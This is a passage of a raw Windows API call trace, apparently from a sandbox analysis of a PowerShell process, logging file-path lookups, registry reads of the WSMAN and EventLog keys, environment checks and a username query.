0x1 [0052.985] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2937130 | out: lpFileInformation=0x2937130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] SetErrorMode (uMode=0x1) returned 0x1 [0052.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.985] GetLastError () returned 0x0 [0052.985] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.985] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.985] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.985] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.986] GetLastError () returned 0x0 [0052.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.986] GetLastError () returned 0x0 [0052.986] VirtualQuery (in: lpAddress=0x14d6c0, lpBuffer=0x14e6c0, dwLength=0x1c | out: lpBuffer=0x14e6c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.986] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6c958e00, Data2=0x2345, Data3=0x43bb, Data4=([0]=0x89, [1]=0xeb, [2]=0x5f, [3]=0x7e, [4]=0x6e, [5]=0xc4, [6]=0x61, [7]=0xd3))) returned 0x0 [0052.986] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x87b1b06f, Data2=0xccb5, Data3=0x448c, Data4=([0]=0xb9, [1]=0xe, [2]=0xdb, [3]=0xf5, [4]=0x13, [5]=0x3b, [6]=0xbd, [7]=0xc1))) returned 0x0 [0053.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0053.005] GetLastError () returned 0x57 [0053.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0053.005] GetLastError () returned 0x57 [0053.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0053.017] GetLastError () returned 0x57 [0053.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0053.017] GetLastError () returned 0x57 [0053.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.019] GetLastError () returned 0x57 [0053.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.019] GetLastError () returned 0x57 [0053.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0053.021] GetLastError () returned 0x57 [0053.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0053.021] GetLastError () returned 0x57 [0053.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0053.023] GetLastError () returned 0x57 [0053.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0053.023] GetLastError () returned 0x57 [0053.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0053.025] GetLastError () returned 0x57 [0053.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0053.025] GetLastError () returned 0x57 [0053.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.026] GetLastError () returned 0x57 [0053.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.027] GetLastError () returned 0x57 [0053.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.031] GetLastError () returned 0xcb [0053.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.032] GetLastError () returned 0xcb [0053.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.033] GetLastError () returned 0xcb [0053.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.033] GetLastError () returned 0xcb [0053.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.036] GetLastError () returned 0xcb [0053.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.038] GetLastError () returned 0xcb [0053.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.039] GetLastError () returned 0xcb [0053.043] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea5c | out: phkResult=0x14ea5c*=0x2f8) returned 0x0 [0053.044] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14eaac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14eab0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14eaac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14eab0*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.044] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x3175c0, lpcchValueName=0x14ead4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14ead4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.044] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x3175c0, lpcchValueName=0x14ead4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14ead4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.045] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x3175c0, lpcchValueName=0x14ead4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14ead4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.045] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14eab4, lpData=0x0, lpcbData=0x14eab0*=0x0 | out: lpType=0x14eab4*=0x1, lpData=0x0, lpcbData=0x14eab0*=0x8) returned 0x0 [0053.045] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14eab4, lpData=0x3175c0, lpcbData=0x14eab0*=0x8 | out: lpType=0x14eab4*=0x1, lpData="2.0", lpcbData=0x14eab0*=0x8) returned 0x0 [0053.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea18 | out: phkResult=0x14ea18*=0x2fc) returned 0x0 [0053.096] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea68, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea6c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea68*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea6c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.096] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x3175c0, lpcchValueName=0x14ea90, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14ea90, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.096] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x3175c0, lpcchValueName=0x14ea90, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14ea90, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.096] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x3175c0, lpcchValueName=0x14ea90, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14ea90, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.096] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14ea70, lpData=0x0, lpcbData=0x14ea6c*=0x0 | out: lpType=0x14ea70*=0x1, lpData=0x0, lpcbData=0x14ea6c*=0x8) returned 0x0 [0053.096] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14ea70, lpData=0x3175c0, lpcbData=0x14ea6c*=0x8 | out: lpType=0x14ea70*=0x1, lpData="2.0", lpcbData=0x14ea6c*=0x8) returned 0x0 [0053.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.097] GetLastError () returned 0xcb [0053.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.099] GetLastError () returned 0xcb [0053.139] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9d8 | out: phkResult=0x14e9d8*=0x300) returned 0x0 [0053.139] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea40, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea3c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea40*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea3c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.141] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x31c) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x32c) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x330) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x334) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.142] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x338) returned 0x0 [0053.142] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.142] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x33c) returned 0x0 [0053.142] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.142] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x5 [0053.159] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x340) returned 0x0 [0053.160] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.160] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x344) returned 0x0 [0053.160] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x348) returned 0x0 [0053.160] RegCloseKey (hKey=0x348) returned 0x0 [0053.160] RegCloseKey (hKey=0x300) returned 0x0 [0053.161] RegCloseKey (hKey=0x344) returned 0x0 [0053.170] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.171] GetLastError () returned 0x3 [0053.171] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9bc | out: phkResult=0x14e9bc*=0x34c) returned 0x0 [0053.213] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea24, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea24*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, 